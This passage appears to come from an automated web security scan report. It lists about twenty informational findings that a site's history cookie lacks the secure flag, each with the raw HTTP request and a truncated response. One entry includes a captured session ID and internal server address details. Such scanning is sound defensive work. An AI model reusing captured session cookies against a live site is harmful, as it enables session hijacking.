2.126. https://www.x.com/docs/DOC-3374  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3374

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337343b3130322c333235313b3130322c333432363b3130322c333337353b3130322c333433313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=102916 t=1313157236205992
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.127. https://www.x.com/docs/DOC-3375  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3375

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3375 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337353b3130322c333432373b3130322c333434333b3130322c333433313b3130322c333432363b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b3130322c333631393b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=172605 t=1313157234881833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.128. https://www.x.com/docs/DOC-3426  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3426

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3426 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432363b3130322c333434343b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333432373b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=177923 t=1313157233753621
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.129. https://www.x.com/docs/DOC-3427  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3427

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3427 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=115565 t=1313157233228654
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.130. https://www.x.com/docs/DOC-3431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3431

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333433313b3130322c333434343b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333536323b3130322c333631393b3130322c333638383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=173915 t=1313157234152384
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.131. https://www.x.com/docs/DOC-3443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3443

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3443 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434333b3130322c333631393b3130322c333638383b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=98914 t=1313157232773548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.132. https://www.x.com/docs/DOC-3444  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3444

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3444 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434343b3130322c333536313b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333536323b3130322c333834313b3130322c313631333b3130322c313035313b3130322c313033313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=100315 t=1313157231659068
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.133. https://www.x.com/docs/DOC-3491  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3491

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3491 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333439313b3130322c333631393b3130322c333434343b3130322c333638383b3130322c333536313b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313035313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=218057 t=1313157232304538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.134. https://www.x.com/docs/DOC-3561  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3561

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3561 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536313b3130322c333834313b3130322c333638383b3130322c333631393b3130322c333536323b3130322c313631333b3130322c333831323b3130322c313035313b3130322c313033313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=135641 t=1313157231234077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.135. https://www.x.com/docs/DOC-3562  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3562

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3562 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536323b3130322c333638383b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313035313b3130322c333631393b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=175892 t=1313157230683229
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.136. https://www.x.com/docs/DOC-3619  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3619

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3619 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333631393b3130322c313631333b3130322c333831323b3130322c333834313b3130322c313035313b3130322c313033313b3130322c333638383b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=123460 t=1313157230328400
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.137. https://www.x.com/docs/DOC-3688  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3688

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3688 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333638383b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313033313b3130322c313035313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=147682 t=1313157229798103
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.138. https://www.x.com/docs/DOC-3811  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3811 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:54 GMT; Path=/
Vary: User-Agent
JP: D=104592 t=1313156394128506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.139. https://www.x.com/docs/DOC-3812  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3812

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3812 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333831323b3130322c313033313b3130322c313631333b3130322c313035313b3130322c313337323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=97831 t=1313157229433265
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.140. https://www.x.com/docs/DOC-3836  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3836

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3836 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333833363b3130322c323234313b3130322c333230313b3130322c313535313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b3130322c333335333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:05 GMT; Path=/
Vary: User-Agent
JP: D=194903 t=1313157245590892
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.141. https://www.x.com/docs/DOC-3841  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3841

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3841 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=198718 t=1313157228930468
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.142. https://www.x.com/message/186684  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/186684

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/186684 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34363935333b312c35333838343b312c34393435343b312c35343036353b312c35333937373b312c34373636333b312c35343035383b312c35333135383b312c35333137323b312c35333235323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:40 GMT; Path=/
Vary: User-Agent
JP: D=137098 t=1313157519959178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.143. https://www.x.com/message/198017  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34393435343b312c35333937373b312c35343036353b312c35343035383b312c35333838343b312c34373636333b312c35333135383b312c35333137323b312c35333235323b312c35333331323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.144. https://www.x.com/message/211333  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211333

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211333 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333135383b312c35333137323b312c35333235323b312c35333331393b312c35333331323b312c35333037353b312c35333334333b312c35333539323b312c35333437393b312c35333631303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=58458 t=1313157516498640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.145. https://www.x.com/message/211439  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211439

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211439 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333137323b312c35333235323b312c35333334333b312c35333331393b312c35333331323b312c35333037353b312c35333539323b312c35333437393b312c35333631303b312c35333631393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=102902 t=1313157516178631
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

